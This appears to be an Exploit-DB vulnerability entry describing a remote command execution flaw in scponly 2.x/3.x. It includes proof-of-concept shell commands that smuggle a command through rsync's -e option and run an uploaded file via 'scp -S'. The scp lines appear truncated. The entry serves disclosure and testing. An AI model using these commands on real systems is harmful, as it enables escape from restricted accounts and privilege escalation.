SCPOnly 2.x/3.x - Remote Arbitrary Command Execution Vulnerability

ID EDB-ID:24794
Type exploitdb
Reporter Jason Wies
Modified 2004-12-02T00:00:00


SCPOnly 2.x/3.x Remote Arbitrary Command Execution Vulnerability. Remote exploit for linux platform


scponly is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

Versions prior to 4.0 are reported susceptible to this issue.

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'

scp restricteduser@remotehost:/tmp/

ssh restricteduser@remotehost 'scp -S /tmp/ localhost:/dev/null /tmp'